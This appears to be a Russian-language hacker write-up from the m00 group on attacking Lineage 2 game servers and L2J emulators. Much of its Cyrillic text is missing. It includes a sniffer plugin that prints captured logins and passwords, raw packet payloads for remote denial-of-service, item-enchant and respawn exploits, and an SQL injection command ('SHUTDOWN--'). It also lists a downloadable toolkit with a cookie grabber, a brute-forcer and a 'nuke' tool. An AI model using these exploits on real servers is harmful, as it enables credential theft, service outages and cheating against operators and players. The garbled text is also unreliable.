		i = 2; printf("Login: ");
		while(PLD->PL_data[i++] != '\x00' || i != 16)
			printf("%c",PLD->PL_data[i]);
		
		printf("\nPassword: ");
		while(PLD->PL_data[i++] != '\x00' || PLD->PL_data[i] != '\x08')
			printf("%c",PLD->PL_data[i]);

		printf("\n");
	}
}
/* eof */

====> sn_plugins.h <====
/* sniffit plugin wiring (the PLUGIN2_* names — presumably the second plugin
   slot): display name, per-packet hook and init hook, followed by the plugin
   body itself, which is pulled in textually. */
#define PLUGIN2_NAME 	"LineAge2 c3 Plugin"
#define PLUGIN2(x)	PL_la2_plugin(x)
#define PLUGIN2_INIT() init_la2_plugin()
#include "la2_plugin.plug"
/* eof */

 ,   ,         sniffit.   
       blowfish     make-.
m00.blackhat.ru/m00-la2sniff.jpg -      lineage2 
   sniffit      www.antaras.ru (217.107.212.212 -
 -).


3.    lineage2 
  ,   8    -   ? ,  
 4 :>       ,   lineage   -
 .  l2j ,     true  false,
 -    .  ,  l2j   .
,  ,  ,  ,  l2j.


4.  "" login-
 ,     ,   /    0x03
( ,    ).       .
    10-  3 ,       , 
  0x01 (  ),   www.la2.ru  0x03    
   (,     "-").
  ,    la2.ru,   -  -
    tcp-.
           .


5. 
          1  2,    
   .
   ,  ,   login- 1    ,  
 game-        . ,   
         .
        IID  OID.
   WH,      ,      , ..
       .


6.  ""   
  .       ( )  hint.
 ,    ,  lineage   .      
 (  ).            ().
       .    ,     .
      :
0B //  
45 00 6D 00 30 00 30 00 00 00 //  
04 00 00 00 // 
00 00 00 00 // 
35 00 00 00 //   ()
14 00 00 00 // 6  ,   ,   
27 00 00 00 //
2D 00 00 00 //
1B 00 00 00 //
1D 00 00 00 //
0A 00 00 00 //
00 00 00 00 //  
00 00 00 00 //  
00 00 00 00 //  
       "m00"  . 
,   ( )       .   
        (    =)). , , , 
           ,     .  
        (      :)),  ,   ,
  ,     .
  ,      NPC         . 
,        NPC  .  , ,   ,  
 "Spoil"  NPC .    ,         ?
  ,        (   ""),    
  .  ,   ,    20-    -,
    "Elven Knight" (   ).
      .
 ,       .
 ,    ,   2    . LA2        
    .  ,  ,   5-  human fighter'   
mortal blow   ( ,   SP).      .
  ,   l2j  -   .       
,    GM-.


7. .
       ,    - god mode.
,  ,    1000 ,   -   =)
 ,   ?      ,     :
   .
  ,     0 HP   ,     (    :) -
  ).   ,      0 HP,        HP  ?
     0 HP.  la2   :      "return to the nearest village"
     l2.exe,       0 HP     (    ).
   ,   RequestRestartPoint-     Apearing,  
     HP   .      ,   
  .
,      "" 0?   ,    HP     float
(  ,       ).  ,     
HP  0   bleed  poison,      0,   HP  ,   .
     0 -  .
,  0 HP  ,    ,     . 
1)        - (     ).  ,
  ,         ,     HP/MP. ,
    - ,   .     .
2)       -. ,     , 
 human'   .   ,       human mage,  
 human fighter,    .
        :
	a)         .
	b)   ,  HP   ,       .
3)  , ,  -        hint.
  ,       .     65%+,    
,   .    ,     90%+,   ,     ,  
  HP!     , ,     ,      ?
    !   ,        ,  HP   
!        -    (reborn.ru - C4)  
  .     ,      blazing skin/freazing skin.
4)       -  demon's set.             
.    ,             .

       .      
  -   HP -   lvlup'   heal'.     bleed, poison,
 .

     "fake death".      FD          
     .   ,  .


8. 'remote DoS'    
      ,      ""   
 . LA2      (  - -     
,      ),      .  ,  
( )  game-,   "  ".   ?  , ,
 ? !  ? !!      ? !!!
 ,    ,     resp time (fairy queen timinel - 
5 , )     . ,  ,  ,  
.       5   3- .
   ?
 l2j 100%   -  .
72 // RequestCrystallizeItem
00 00 00 00 // OID 
FF FF FF FF // 
     OID   .     .
    .     ,   . ? 
  ,         (   ,  
).       ,    ,    
 .


9. integer overflow    l2j
  ,      ,   lineage2   ,
      l2j    
:
public void run()
{
    _log.fine("loginserver thread[C] started");
    int lengthHi = 0;
    int lengthLo = 0;
    int length = 0;
    boolean checksumOk = false;
    int sessionKey = -1;
    String account = null;
    String gameServerIp = null;
    try
    {
        InetAddress adr = InetAddress.getByName(_gameServerHost);
        gameServerIp = adr.getHostAddress();
        Init startPacket = new Init();
        _out.write(startPacket.getLength() & 0xff);
        _out.write(startPacket.getLength() >> 8 & 0xff);
        _out.write(startPacket.getContent());
        _out.flush();
        do
        {
            lengthLo = _in.read();
            lengthHi = _in.read();
            length = lengthHi * 256 + lengthLo;
            if(lengthHi < 0)
            {
                _log.warning("Client terminated the connection.");
                break;
            }
            byte incoming[] = new byte[length];
            incoming[0] = (byte)lengthLo;
            incoming[1] = (byte)lengthHi;
.................
    'integer overflow'     ,
     -  (off-by-two overflow),    ...
    2   l2walker'.  ,  100%  .
     ,    ,     .
 ,  L2J       .       .


10. SQL-injection
,       , ,     -   unicode- 
iis.    ,   ,      lineage.      ,
  ,    la2- (   ,   ,    )  
   sql-. ,  : /block 'SHUTDOWN--    sql-.
   ,  ,    ,       
"SHUTDOWN--"    ,    -     ,   
  .
        ,   , ,    ,  
  .  ,      :)


11. 
 ,           "".
   ?   ,        , 
 .       .  +3   ,   .
,    "" ,      (,  ,   ).
      ""       .
 ,  -  -     +6,   ... !     
 ,    100%  .   ,    1   1- , 
 ,      "",   (,  INT   
 ),   ,  soulshots,     ,   
      . , ,      ,      
,    ,    -  100%        .
,       .     ?     .
 ,   ,      :
1-  -          ,    .

14 //   (UseItem)
86 a4 13 40 // OID 
00 00 00 00

      ,   :

58 //   (RequestEnchantItem)
74 a4 13 40 // OID 

  .
 ,     ,   ,   
        ,    .     artmoney
 100% .   ,      .
,       .     ?
      :
1.        
2.  RequestEnchantItem-  
3. drop'    (     ),     (fake)
.
4.      RequestEnchantItem-.  ,    .   ?
      antaras.ru,       , , ,    100%
     .    ,     ,   
      .

 -  ,    fake-.      ,   
,  -  .         ,  -
     .         ,    .
   ,    -       .
  ,    ,   .     
     .      "".
     cheaters.net.ua,     F4llen'a (    ):
+1 100% 
+2 100% 
+3 100%
+4 -+-+-+ (+-+-+-)   (----++++----+++) 
+5 ++---++-++----+++--- 
+6 +++++----+--++-- 
+7 +++++++++------ 
+8 +++-+-+++----+++ 
+9 ++-++--++---++-- 
+10 ++--+--++--+ 
"+"   , "-"  .
   ""   ,        " ":
)      +++++--+----+ 
) 2    ++--++-----++-++--- 
) - +-+-+-+ 4     . 
,        ,    / .
  ,       ,      ,   
    +15-.
     /   :
  /  . 
 +4         15/7         0.466
 +5         20/9         0.45
 +6         16/8         0.50
 +7         15/9         0.60
 +8         16/10        0.625
 +9         16/8         0.50 
 +10        12/6         0.50
     ,     F4llen'.    
 ,   0.52,  ,        .  
   ,         .
  ,      1  0.     240 ,
  60-  (    )      ( 
 "")          240  (    
     240):

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

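// Toy experiment for the enchant-rate discussion above: draw 240 coin flips
// with rand() and print them in blocks of 60, each block followed by its
// ones/zeros tally and the percentage of ones, then the overall percentage.
//
// Fix relative to the published version: the block boundary was `!(i % 60)`,
// which fires after the first sample and then every 60, so the first "block"
// held one sample and 241 draws were needed; here every block is exactly 60
// samples and the total is 240, as the text describes.  rand() % 2 is the
// libc PRNG, not a cryptographic source — adequate for this illustration only.
int main(void) {
  enum { TOTAL = 240, BLOCK = 60 };
  int ones = 0, zeros = 0, ones_total = 0;

  srand((unsigned)time(NULL));
  for (int i = 0; i < TOTAL; i++) {
    int r = rand() % 2;
    printf("%i ", r);
    if (r) {
      ones++;
    } else {
      zeros++;
    }
    if ((i + 1) % BLOCK == 0) {
      // percentage of ones in this block: ones / (BLOCK / 100)
      printf("\n%i/%i\n : %.2f\n", ones, zeros, ones / (BLOCK / 100.0));
      ones_total += ones;
      ones = 0;
      zeros = 0;
    }
  }
  // overall percentage of ones: ones_total / (TOTAL / 100)
  printf("   : %.2f\n", ones_total / (TOTAL / 100.0));
  return 0;
}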

,     :
-----------------------
0 1 1 0 1 1 0 1 1 0 0 0 0 0 0 1 0 1 0 1 1 0 0 1 1 1 0 1 1 1 0 0 0 1 0 0 0 1 0 1
1 0 0 0 0 0 0 1 1 1 1 1 0 1 1 0 1 0 0 1
29/31
 : 48.33
0 0 0 1 1 0 0 0 0 1 0 1 1 1 0 0 0 1 1 0 1 0 1 0 1 0 0 1 1 1 1 0 1 1 0 1 0 0 0 1
0 1 0 0 1 1 0 1 1 0 1 0 1 1 0 1 1 1 1 1
32/28
 : 53.33
1 0 1 1 0 1 0 1 1 1 0 1 1 1 0 1 1 0 0 1 1 0 1 1 1 1 0 1 1 1 0 0 0 1 0 0 1 1 0 0
0 1 0 1 1 0 0 1 0 1 0 0 1 0 0 0 0 1 0 0
31/29
 : 51.67
1 0 0 1 1 1 1 0 0 0 0 0 0 0 1 1 0 0 1 1 1 0 1 0 0 1 0 0 0 1 0 0 0 1 0 1 0 1 1 0
1 0 1 0 0 0 1 0 1 1 0 0 1 0 0 1 0 1 1 1
27/33
 : 45.00
   : 50.00
-----------------------
 ,    " "    f4llen  ,   0  1  
   .        (  60- ),
     50%,         
  0  1.
 ,  f4llen'   ,     .

      ,  ,         :
 L2j     ,      ,    .  
 ,        ,   .
 ,  lineage2 off   .

 ,  ,      rand(),     =)     
 ,   ,    ,    ,   .


 , "  ,      " (c) -.



12.  (  ).
       ,  l2j     .      
        l2j  off.
     la2   . ,  ,      
 . ,     ,   ,       
     ,  ,     .      
       .        
" ", , ,       .
 l2j   ,     .   ?  ,    
       . ,   (    
 ),     ,    ,   (  )     .
     l2j.  1   3/C4    ,     
      .

    ,     "0x01 MoveBackwardToLocation".  
    -      .      
       . ,         ! 
,           ,   "0x48 ValidatePosition".
 ,  ,        ,     ,
 ,    .
  ,   ,   =)



13.   SocialAction (0x1b)
  SocialAction, ,   . ,   , ,   , 
 LVL UP'    SocialAction'. ,   ,    SocialAction
 ,           lvlup =)  , .
  SocialAction-:

1b //   (SocialAction)
0f 00 00 00 //  action' (0f - lvlup)



14.  c Ride (0x6a)
 "Ride"  ,       .
:

6a //  
00 00 00 00 // 0/1 /
00 00 00 00 //  : 1 - , 2 

         "Ride",   ,   (    
   OID -     ,      ,  ),     
   ,      :)   ,   .
,    2-    ,      ,  
   .     ,   ,  :
6a 01 00 00 00 01 00 00 00
   ,     . ,      .      
 .
 ,      SocialAction      Maddaemon.  .



15.    
    ,     .   ,      
  (  4-),      human'? ,  human   
  NPC human',          .  , ,    human'
   __ 1/C3 . 4            .
 ,      la2 C4    ,  .     
 ,     ,      "/target".
, ,         ,     , .. 
   ,         .

       4  ( l2j),  .
 , ,      )   ,  .     -
.

http://m00.void.ru/nuke.rar -       4 .   ,   
    .



16.   RequestRestartPoint (    )
        www.allcheats.ru   sshd.
  ,       ,     .      
: "return to the nearest village".       :

6d //   (RequestRestartPoint)
00 00 00 00 // ,      ,   

   ,           .  ,  ,  .
LA2 3/C4      ( ):

0  return to town ( )
1  hide PK (  ,         ,   )
2  to castle ( )
3  to siege HQ (    )
4  fixed, festival (       ).

 ,   "00 00 00 00", "04 00 00 00"      ,    .
    ,      ,      .
  ,   ,    .        ,  
,     -  .  antaras.ru,  ,   ,   
,   .     "RequestRestartPoint"    "03 00 00 00"  
 (  :))   .



17.       ,   -   ?
,    .       ,        lineage2,
     .  ,       :)
 ,        (     
  ,   ).          www.l2extreme.com,
  ,      .
   ,       "6IlZk9qR[!]"  .



18. 
,    - .  ,          
 . ,          ,    
  la2brute.5bb.ru.


V.   
[]
  ,         LA2Monster.


VI.    C4
 4      .       .
L2J C4        RSA (     NCSoft).
,  private/public-    .     
 1024-  ,   __ blowfish    /.
   ,          . , 
  Rc5-64,   128-      .
 ,   key-pair  RSA   .      
   openssl  ~1.5-2 ,     , ,  1000  -
 .   , login-   NCSoft       
game-, ,     ,        .
   1   4, RSA    .     
,      game-.     l2j   1-4
     4 .



VII. .
,      RFC  lineage, , ,  
 ,              .   ,  , 
     .
   -     (,   :D)    ,   d4rk@securitylab.ru,
    www.allcheats.ru   "nop".
  .


VIII. .

http://72.14.203.104/search?q=cache:Dt3J-o9GNJcJ:gamehaqs.com/forums/
index.php%3Fshowtopic%3D5041+blowfish+lineage2&hl=ru&gl=ru&ct=clnk&cd=1 -
    bbs',    -  lineage.
  ,       l2j      
  .
http://forum.ragezone.com/server-help-extra/lin1-server-emulator-incomplete-cant-even-login-26438.html -   
http://allcheats.ru/forums/showthread.php?t=1844 -   ,   .   
,  .
http://cheaters.net.ua/forum/index.php?s=083fef4f61997fc4be2ad3b0a98ba8a2&showtopic=254&pid=2254&st=0&#entry2254 -
 F4llen'  fake-     (        ).
http://www.javable.com/columns/crypto/algorythms/01/ -    blowfish.
http://arbuz.uz/z_pihns.html -          . ,  
.
http://www.securitylab.ru/analytics/216301.php -     . 
    -  HalfLife,     .
http://la2brute.5bb.ru -  .
http://m00.void.ru/nuke.rar -   -    13 (   )
http://la2brute.5bb.ru/viewtopic.php?id=52 - ,    LA2Fun      
    l2j.
http://la2brute.5bb.ru/viewtopic.php?id=53 - ,    (  )  
  LA2Fun.


IX.   .
     : m00.blackhat.ru/la2shit.rar
:
game-serv-encryption.txt -      game- ( sauron  allcheats.ru).
grabber.c -         www.antaras.ru. ,  antaras.ru  
 cookie,         .        .
ID.rar -      ID
la2brute_1.1.OLD.rar -    la2brute.    -  . , , 
   PoC' =)
la2reklamer.rar -     .    ,     
       .
raid.jpg -  ,      =)  Hint
screenshot1.jpg -   auth-
screenshot2.jpg -       sniffit     2 .
shot1.JPG, shot2.JPG, shot3.JPG -  ,    la2fun
sniff.exe -    .. ,     / la2-.
  login-  game-.     ,      
    =)
mass.nuke.avi -  ,  -       .
la2-example.c -   RequestAuthLogin-
Sniffit.LA2C3.plug.rar -   sniffit,     RequestAuthLogin- 
   /
l2.crash.ini -      L2C3     .   
      ,    l2.ini  .
la2fun_1.2.demo.rar -  LA2Fun 1.2.   ,  ,   ,    .
  LA2Fun  LA2Bute 1.5 (3/C4)        ,     ..
   linux- la2brute,  -    :\


  h0snp, sshd  hint =) 
   Silence/EF ;)   #m00  irc.blackhat.ru


(c) darkgrey / m00.blackhat.ru


